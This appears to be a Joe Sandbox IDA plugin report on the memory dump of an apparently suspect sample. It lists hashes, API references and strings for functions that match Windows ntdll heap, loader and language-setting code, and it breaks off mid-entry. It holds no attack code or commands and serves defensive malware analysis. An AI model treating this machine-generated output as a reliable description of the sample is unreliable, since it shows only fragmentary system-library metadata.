                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                        • API String ID: 3446177414-1745908468
                                                        • Opcode ID: c1d1e19d4e1cac98cefd799a16bae05b3147aa56e8656e0b27830ee35bb58090
                                                        • Instruction ID: f3366998f9c470be791301c20953c897a7bd4482ea1f1e3a2efbd47606fc3631
                                                        • Opcode Fuzzy Hash: c1d1e19d4e1cac98cefd799a16bae05b3147aa56e8656e0b27830ee35bb58090
                                                        • Instruction Fuzzy Hash: 6891FC35901645DFEB01CF68C440AEDFBF6EF1A318F1482A9E455ABB61CB39A941CF12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 629e1777cacc4cd8d5eb10270e030bc14c2f297e8eff8e1cc7f8e95873089f57
                                                        • Instruction ID: 81d807e998ef697654eb16bae19e3121867ea0cb3bba8b4008a8d0783e3ec53c
                                                        • Opcode Fuzzy Hash: 629e1777cacc4cd8d5eb10270e030bc14c2f297e8eff8e1cc7f8e95873089f57
                                                        • Instruction Fuzzy Hash: 2012EF74642742DFDB65CF28C440BB6BBF9FF0A328F148659E4958BA41E738E881CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                        • API String ID: 0-3532704233
                                                        • Opcode ID: 5fcc2225f681f594e792b7815a333322e17791aa9e7608026226ae47f0a01404
                                                        • Instruction ID: 70b1667e09cc57890d9ca21676ad53d8f520d9e7abfef4654ca3d78a85c108b2
                                                        • Opcode Fuzzy Hash: 5fcc2225f681f594e792b7815a333322e17791aa9e7608026226ae47f0a01404
                                                        • Instruction Fuzzy Hash: D6B1ADB55083159FD711CF24C880B5BB7ECEB99758F414A2EF888E7210D734E949CBA2
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 3446177414-3570731704
                                                        • Opcode ID: 9d0769166d2b06e2686901b523f147d75e5616e103774bc2294a9d56265a61c3
                                                        • Instruction ID: 587203ebd2927a5f985eb96626f91c2bb3ff96044a3090b29e5f28c0b8397e48
                                                        • Opcode Fuzzy Hash: 9d0769166d2b06e2686901b523f147d75e5616e103774bc2294a9d56265a61c3
                                                        • Instruction Fuzzy Hash: 50925975A51368CFEB24CF18CC40B99B7BABF45368F0182EAD849A7251D7749E80CF52
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 3791D959
                                                          • Part of subcall function 378F4859: RtlDebugPrintTimes.NTDLL ref: 378F48F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1975516107
                                                        • Opcode ID: d7caf6336953ca9ca881de170930f56d3b7b177eaacc0a29e9cc81ecdd0f986b
                                                        • Instruction ID: 3031964e936a66fd8357dc1b53b37aff7256bd39ea316613f92ddd8ce8f23300
                                                        • Opcode Fuzzy Hash: d7caf6336953ca9ca881de170930f56d3b7b177eaacc0a29e9cc81ecdd0f986b
                                                        • Instruction Fuzzy Hash: 2051DE75A04349DFEB10CFA4C88579DBBB2BF4832CF144399C4107BA92C778A992CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                        • API String ID: 0-3063724069
                                                        • Opcode ID: b433fb55851600815fe4b6421644ceddc9ac51829d7c5f4b21262e9c978034a2
                                                        • Instruction ID: 49cc8ac5e93572ef5b38c9b6d78ac4f2ee167bc2e4e68de345b592c7ec69651b
                                                        • Opcode Fuzzy Hash: b433fb55851600815fe4b6421644ceddc9ac51829d7c5f4b21262e9c978034a2
                                                        • Instruction Fuzzy Hash: 91D1D1B2805715BFE721CA60C840B6BB7ECAF8876CF410B2DF984A7251D774D9488B93
                                                        Strings
                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 378ED262
                                                        • @, xrefs: 378ED0FD
                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 378ED0CF
                                                        • @, xrefs: 378ED313
                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 378ED196
                                                        • @, xrefs: 378ED2AF
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 378ED2C3
                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 378ED146
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                        • API String ID: 0-1356375266
                                                        • Opcode ID: 276fe45db181591b23978212accd0f82843fc3ce08fe9fca13e3983c46583bbb
                                                        • Instruction ID: a5d41f51901f177f1955dfc028df7a5effab32e27436d7f04cf13f0731f055fe
                                                        • Opcode Fuzzy Hash: 276fe45db181591b23978212accd0f82843fc3ce08fe9fca13e3983c46583bbb
                                                        • Instruction Fuzzy Hash: 1FA14CB19083459FE321CF24C480B5FB7E8FB99769F404A2EE598A6240D778D948CF63
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 0747850219d5879855609a1473a5411fb95a746d426841e093117ff83a82e717
                                                        • Instruction ID: 6ae822305e420b3d38f6eb9cfd011c927ae38022b65228dc0ab2a54d2d248ab1
                                                        • Opcode Fuzzy Hash: 0747850219d5879855609a1473a5411fb95a746d426841e093117ff83a82e717
                                                        • Instruction Fuzzy Hash: D042EF75219341CFE301CF28C884B2ABBE9FF9A398F044A6DE4958B751DB34E941CB52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                        • API String ID: 0-122214566
                                                        • Opcode ID: 5afa685a0e4d69c2466d3eb803720329b4b56cc31b33140f90db4779b656064e
                                                        • Instruction ID: 6fe1144b3f79d22ca9865366891b112414c219245639a93ada9524cdca8238a0
                                                        • Opcode Fuzzy Hash: 5afa685a0e4d69c2466d3eb803720329b4b56cc31b33140f90db4779b656064e
                                                        • Instruction Fuzzy Hash: 26C14871A10359ABEB14CF64CC80BBEB7A9AF4532CF1043A9EC01AB691DB74D944DF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: a0393966cc70b271e6ec66802e7e3defb94f6dd6816071596478b104ebca5072
                                                        • Instruction ID: 3a688abb78a0194c9b146e6c4674332ed0b63f0ee8c711282ee32e338694885c
                                                        • Opcode Fuzzy Hash: a0393966cc70b271e6ec66802e7e3defb94f6dd6816071596478b104ebca5072
                                                        • Instruction Fuzzy Hash: 93F1BE74610609DFEB14CF68C884B6AB7FAFF45328F1182A8E4159B392D774E981CF91
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 3796031E
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 379602E7
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 379602BD
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 9c74eeb2da040c00886de71619ab977309cf77613e9007a45fc8782411e23388
                                                        • Instruction ID: 063d536baa5fb6c8d94bfdf2363b82161ecd3224efd25abfee485504b59ba4bd
                                                        • Opcode Fuzzy Hash: 9c74eeb2da040c00886de71619ab977309cf77613e9007a45fc8782411e23388
                                                        • Instruction Fuzzy Hash: 17E1BE74605749DFE721CF28C884B1AB7E6AF8436CF100B59F4A58B2E2D774E855CB42
                                                        Strings
                                                        • Kernel-MUI-Language-Allowed, xrefs: 3791527B
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 37915352
                                                        • Kernel-MUI-Language-SKU, xrefs: 3791542B
                                                        • Kernel-MUI-Number-Allowed, xrefs: 37915247
                                                        • WindowsExcludedProcs, xrefs: 3791522A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 5e5c4f84694857f43c5e682bf12e40c60e59598966bf6cce888825b8f1b921cc
                                                        • Instruction ID: 8e6e1eb06e46977687df9483d839e7a3614039a573d33cc83177ccd42a88fa00
                                                        • Opcode Fuzzy Hash: 5e5c4f84694857f43c5e682bf12e40c60e59598966bf6cce888825b8f1b921cc
                                                        • Instruction Fuzzy Hash: 24F15D76D11229EFDB11CF98C980A9EBBBDFF48668F51426AE401E7311D7749E01CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 022769e34d034557bc90e6d5aa6ca4947eed4a552484b40e9f3f63fb795a0601
                                                        • Instruction ID: 1c00e2ff9fa4b8253670033c36a48d1a4046af24ec434a4679e6334c5428c59d
                                                        • Opcode Fuzzy Hash: 022769e34d034557bc90e6d5aa6ca4947eed4a552484b40e9f3f63fb795a0601
                                                        • Instruction Fuzzy Hash: 9AF13872E406528FDF08CFA8C99067EBBF6EF98214B59426DD456DB380D634EA01CF51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                        • API String ID: 0-3061284088
                                                        • Opcode ID: dab89ee98c09f08563544aa03afac02617526d3bc4df0b6da0bdc4eed5dfb5fb
                                                        • Instruction ID: e7038680f91ea0277f16d4ae2ff7a2bf46926fb0ad12d60fc1309940dd0b9771
                                                        • Opcode Fuzzy Hash: dab89ee98c09f08563544aa03afac02617526d3bc4df0b6da0bdc4eed5dfb5fb
                                                        • Instruction Fuzzy Hash: 7B012876016156DEE215D31CD40EF62BBECDF53634F24419AF41047F60DB68AC81CE62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 9b4b6bbb01eb60dda029b0df7e4b4bef12bc05815fa57e48bc753a30b3a61a42
                                                        • Instruction ID: 54e818330b3a15721e5d74b9b5e72089bef35cb75784290715afea10c406e2af
                                                        • Opcode Fuzzy Hash: 9b4b6bbb01eb60dda029b0df7e4b4bef12bc05815fa57e48bc753a30b3a61a42
                                                        • Instruction Fuzzy Hash: B413AD74A10755DFEB14CF68C880BA9BBF5BF49328F1482ADD849AB381D774A841DF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$.mui$.mun$SystemResources\
                                                        • API String ID: 0-3047833772
                                                        • Opcode ID: cc77e2afdb6807c43b9dae53e5b8f385ea783fba8c4d315beec56e05fdfde69c
                                                        • Instruction ID: b6ab3c050a9e88057a3bda0eacee93c4eba88d75fca291ca53825ff0cd670e64
                                                        • Opcode Fuzzy Hash: cc77e2afdb6807c43b9dae53e5b8f385ea783fba8c4d315beec56e05fdfde69c
                                                        • Instruction Fuzzy Hash: A4624B72A003299FDB21CF54DC40BE9B7B8BB1A354F4045EAE409A7A50DB369F85CF52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 0-2586055223
                                                        • Opcode ID: 06a04a28386ad498964a03d010e78055a3e1f63a5a6324f340299fdd4e77087b
                                                        • Instruction ID: 1833480d6e52c8c6bf3cc4d3a7d4cb1425b7ef06154064b0d05c145ce452c70b
                                                        • Opcode Fuzzy Hash: 06a04a28386ad498964a03d010e78055a3e1f63a5a6324f340299fdd4e77087b
                                                        • Instruction Fuzzy Hash: 9F61F2762057849FE711CB28C844F6677ECEF957A8F040668F9548B6A2DB38E901CB62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                        • API String ID: 0-336120773
                                                        • Opcode ID: 2595ac1ec84afca196a05ca912efd9a85466fb581393377185fc68a021b84cb1
                                                        • Instruction ID: 4d540f3099590ccc29070a41ec5104f7f08c5831ceff336ff5141d176543c947
                                                        • Opcode Fuzzy Hash: 2595ac1ec84afca196a05ca912efd9a85466fb581393377185fc68a021b84cb1
                                                        • Instruction Fuzzy Hash: C831D075242211EFE750DB98C880F56BBFCEF06668F540255F801DB690EB38EC40CE66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                        • API String ID: 0-1391187441
                                                        • Opcode ID: d7a3e395c8ed2fe2520e8480d960b4da0a8719214987185f47d2c2110084e85b
                                                        • Instruction ID: 5174f085e3600720f333c947ca6dd7b0bfaef507ba845dd64b22e414cbec23f3
                                                        • Opcode Fuzzy Hash: d7a3e395c8ed2fe2520e8480d960b4da0a8719214987185f47d2c2110084e85b
                                                        • Instruction Fuzzy Hash: BA31D036601219EFDB02DB48C884F9EB7FCEF56774F104191E814AB691EB74E941CE62
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 464fb9193c6cf189b6f0b41f0296e58efae198156e4518511ca2aa4e093ab638
                                                        • Instruction ID: 32fce7d0abc8dc049d5beadac6e79e1715b5475f2b5f0b100cdea47ecaedc5b7
                                                        • Opcode Fuzzy Hash: 464fb9193c6cf189b6f0b41f0296e58efae198156e4518511ca2aa4e093ab638
                                                        • Instruction Fuzzy Hash: FE510075A40B19EFFB05CF68D844BADB7B4FF14368F10426DE41293290EB74A955CB81
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 89a3002fd208977fd68cdae76f7ea100038ecc4d5ce737309d5c866b152892ca
                                                        • Instruction ID: 21bb9cbf0b226930a3bd8b5235fe0608dfdaaf3335d3330454229f7dcf605175
                                                        • Opcode Fuzzy Hash: 89a3002fd208977fd68cdae76f7ea100038ecc4d5ce737309d5c866b152892ca
                                                        • Instruction Fuzzy Hash: 4931F6B5E1421ACBEB00CF98D845AEDFBF5BF49354F14826AE811B3250DB389941DF60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 66f37d6798206b16f0cc421bfac8afb6948eaff9f5c7a55e4ad684a4a247bdbe
                                                        • Instruction ID: 3fa3ebeb38c7d6304f603371df0364ef139ce70e6a8580434235adbcac60f646
